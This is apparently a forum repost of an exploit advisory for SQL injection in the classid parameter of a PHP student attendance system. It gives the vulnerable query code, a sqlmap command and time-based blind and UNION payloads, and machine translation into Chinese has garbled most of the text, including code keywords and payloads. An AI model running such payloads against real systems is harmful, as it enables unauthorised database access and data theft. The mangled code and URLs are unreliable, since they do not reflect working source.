简单的学生出勤系统v1.0-“ classID”基于盲人联盟的SQL注入

[HackApt-37 Team已验证会员]

＃利用标题:简单的学生出勤系统v1.0-“ classid”基于盲人联盟的SQL注入
＃DATE: 2023年12月26日
＃利用作者: Gnanaraj Mauviel（@0xm3m）
＃vendor: oretnom23
＃供应商homepage3360 https://www.sourcecodester.com/php/...ystem-system-using-php-and-php-and-mysql.html
＃软件link: https://www.sourcecodester.com/sites/default/files/files/download/oretnom23/php-php-antendance.zip
＃版本: V1.0
＃在: Mac OSX，XAMPP，Apache，MySQL上测试
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
源代码（/php-andendance/classes/actions.class.php）:
public函数参加cancestudents（$ class_id=''，$ class_date=''）{
if（empty（$ class_id）||空（$ class_date））
返回[];
$ sql='选择sustical_tbl。
$ qry=$ this-conn-Query（$ sql）;
$ result=$ qry-fetch_all（mysqli_assoc）;
返回$结果；
}
-sqlmap -u'http://localhost/php-andendance/？page=atcathanceclass_id=446class_date=0002-02-20' - batch
---
参数: class_id（get）
Type:基于时间的盲人
title: mysql=5.0.12和基于时间的盲人（查询睡眠）
payload: page=atcathanceclass_id=446'和（从（select（select（5）））zswt）和'nqti'='nqticlass_date=0002-02-20
type:联合查询
title:通用联盟查询（NULL）-6列
payload: page=atcathanceclass_id=446'联合全部选择NULL，NULL，NULL，NULL，CONCAT（0x717171717671,0x7154766a54545453645A7A7A4D4970786A6AF4B647A5 A6D4162756C72636B4A4555746D5555A5A71614D4C，0x71767A7A7A71），null --- class_date=0002-02-20
---

 

H

Windows PowerShell-事件日志旁通单报价代码执行

H

简单的学生出勤系统v1.0-基于时间的盲目SQL注入